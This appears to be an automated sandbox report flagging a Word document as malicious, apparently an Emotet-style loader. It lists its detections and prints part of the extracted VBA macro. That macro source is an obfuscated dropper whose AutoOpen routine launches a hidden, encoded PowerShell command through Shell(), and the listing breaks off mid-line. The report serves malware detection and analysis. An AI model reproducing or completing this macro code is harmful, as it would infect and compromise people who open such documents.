Verdict: MALICIOUS
Risk Score: 242

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function that calls Shell() to execute a command. The reconstructed PowerShell command 'powershell -WindowStyle hidden -e IAAoACgAKA AiAHsANAA4AH0Ae wA4ADk AfQB7ADEAMQAz AH0AewAx ADA M gB9A HsAMQA3ADA AfQB7ADYAMg B9AHsAMQA0AD QAfQB7ADUANQB 9AHsANw A 0AH0Aew A3ADAAf QB7AD EAMwAyAH0Ae wA4ADQAfQ' is heavily obfuscated but indicates the execution of a second-stage payload. This is a common technique for malware droppers.
Heuristics (7)
- ClamAV: Doc.Malware.Emodldr-10058963-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10058963-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18233 bytes |

SHA-256 (macros.bas): acf85da548b57f47835891def38972049a2ecc93c8d6d8e2f6c92df89056a14f
Preview script (first 1,000 lines of the extracted script; the extracted source as recovered by the analyzer, with statement breaks restored):

```vb
Attribute VB_Name = "zmCwwUNSHaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HViLoznHlL()
On Error Resume Next
UuwoVh = Fix(49546 / CSng(7016) * MPMpXl * hUpBV)
VhBn = CDate(45561)
VbXfza = Fix(76182 / CSng(98153) * oduVi * ipriDa)
VhBn = CDate(68859)
HViLoznHlL = JmzONRniPzR + znQzmlIw + fUUGDW + IrSiG + RVIaCHzc + ohlDk + EFXCXbow + ConRhaGfbk + SKSJXIwUWi + JwwBUOipG + BTjGMG + LvXnYORVT
cXhwh = Fix(46829 / CSng(5213) * JwPcMz * ZcKNE)
VhBn = CDate(45057)
End Function
Sub Autoopen()
On Error Resume Next
cQrFq = Fix(99884 / CSng(18807) * TElFuH * cFaHO)
VhBn = CDate(39199)
CKCRZ (HViLoznHlL)
GBPjnR = Fix(11876 / CSng(86777) * iwRvR * ciCRW)
VhBn = CDate(55150)
End Sub
Function CKCRZ(AirCZ)
On Error Resume Next
rGDvH = Fix(1199 / CSng(9373) * zJqdJp * JMsjar)
VhBn = CDate(12817)
MbswORluVR = jUSFTw + Shell(zIPimZsjXG + Chr(vbKeyP) + bziRicn + AirCZ, vbHide)
cLAUd = Fix(85371 / CSng(9427) * zVvKId * JFoahp)
VhBn = CDate(51252)
End Function
Attribute VB_Name = "HRlYpYqCT"
Function JmzONRniPzR()
On Error Resume Next
bsFjBP = Fix(34249 / CSng(20857) * TzvSB * QEPwc)
VhBn = CDate(13470)
ShbZJ = "owersHeLL -WinD" + "owsTyle " + "hidden " + "-e IAAoACgAKA" + "AiAHsANAA4AH0Ae" + "wA4ADk"
uTNmU = Fix(66878 / CSng(18418) * MSUKE * IbcFu)
VhBn = CDate(36763)
NcFVoEfuNY = "AfQB7ADEAMQAz" + "AH0AewAxADA" + "AMgB9A" + "HsAMQA3ADA" + "AfQB7ADYAMg"
bnNGS = Fix(56891 / CSng(88268) * tzUpP * lWPvjB)
VhBn = CDate(19374)
aNfSXIK = "B9AHsAMQA0AD" + "QAfQB7ADUANQB" + "9AHsANwA" + "0AH0Aew" + "A3ADAAf" + "QB7AD" + "EAMwAyAH0Ae" + "wA4ADQAfQB"
fbHww = Fix(14047 / CSng(57455) * qhnHTj * jBFPHT)
VhBn = CDate(39641)
VzYsXt = "7ADIANAB9AHsA" + "OQB9AHsAMQA2" + "ADQAfQB7" + "ADcAMw" + "B9AHsAM" + "AB9AHs"
JmzONRniPzR = ShbZJ + NcFVoEfuNY + aNfSXIK + VzYsXt
End Function
Function znQzmlIw()
On Error Resume Next
VpMXEM = Fix(20165 / CSng(22801) * uUIlw * imcGG)
VhBn = CDate(75710)
Ejndh = "AMwAxAH" + "0AewA" + "xADIANg" + "B9AHsAN" + "wA3AH0Aew" + "AxADI" + "AMQB9AHsAMg"
IiEWj = Fix(87032 / CSng(57383) * CnKcmH * jZajVW)
VhBn = CDate(23603)
GlBiSuRkYQL = "A4AH0Ae" + "wAxADQAMwB9AH" + "sAOAA4AH0AewA" + "xADAANAB9AHsAO" + "QAzAH0AewA" + "xADQAMQ" + "B9AHs" + "AMQA3ADQ" + "AfQB7ADEAMQA"
YNhjad = Fix(59088 / CSng(23809) * MTjiS * dRijsj)
VhBn = CDate(95371)
ZszTocXWZi = "yAH0A" + "ewAxADMANA" + "B9AHsAO" + "AA1AH0" + "AewAx"
LOsCD = Fix(62830 / CSng(50855) * fwfjI * NDIXb)
VhBn = CDate(93690)
ihUqBD = "ADcAfQB7ADEA" + "MAA3A" + "H0AewA4A" + "DEAfQB7ADMA" + "OAB9AHsAOAB9AHs" + "AMwAzAH0AewA" + "xADYANwB9AH"
TaDRq = Fix(93207 / CSng(29180) * pTRaEW * haafn)
VhBn = CDate(88958)
lhjrTX = "sANgA1" + "AH0AewA0" + "ADMAfQB7ADE" + "AMAAxA" + "H0AewAxADcAMwB9" + "AHsAMQAxADA" + "AfQB7ADEANAA" + "5AH0Ae" + "wAxADAAOAB" + "9AHsAMQA0"
kDlZbE = Fix(58809 / CSng(45651) * FAtsn * lNkLip)
VhBn = CDate(54554)
bDTHvd = "AH0AewAxADIA" + "MwB9AHsAMQ" + "A2ADI" + "AfQB7ADEAM" + "QAxAH0AewA5ADYA" + "fQB7ADMAOQB" + "9AHsAMQA2"
FEfuV = Fix(65659 / CSng(94033) * JVfqAf * UKISw)
VhBn = CDate(23599)
YjMTHCjnCD = "ADAAfQB7ADEAN" + "AA2AH0AewAzAH" + "0AewAxADQA" + "MgB9AH" + "sAOAA"
KditpN = Fix(91356 / CSng(53955) * zIpjV * JIpXKr)
VhBn = CDate(45848)
DQLGS = "yAH0AewAyAD" + "YAfQB7ADMANgB" + "9AHsANgAzAH0Aew" + "AxADE" + "AOQB9" + "AHsAMQAyADQ" + "AfQB7ADEANQA1AH"
znFwP = Fix(630 / CSng(41587) * dBfuB * ctjAh)
VhBn = CDate(11600)
AwsUAN = "0AewA1ADQAfQB7" + "ADEAMwA4AH0A" + "ewA0ADEAfQ" + "B7ADUAMg" + "B9AHsAMQA2ADYAf" + "QB7AD" + "MANAB9AHsA" + "NQAzAH" + "0AewAxADMANw"
hLzvYB = Fix(99775 / CSng(54724) * CimRjF * QfbuZi)
VhBn = CDate(78108)
qczLZlBSZi = "B9AHsAMQA1" + "AH0AewA5ADc" + "AfQB7ADE" + "ANgAzA" + "H0AewAx" + "ADQAMAB9AHsA" + "MwA3AH0AewA1A" + "DYAfQB7ADEAMg" + "A4AH0A" + "ewA2ADQAfQB"
znQzmlIw = Ejndh + GlBiSuRkYQL + ZszTocXWZi + ihUqBD + lhjrTX + bDTHvd + YjMTHCjnCD + DQLGS + AwsU ... (truncated)
```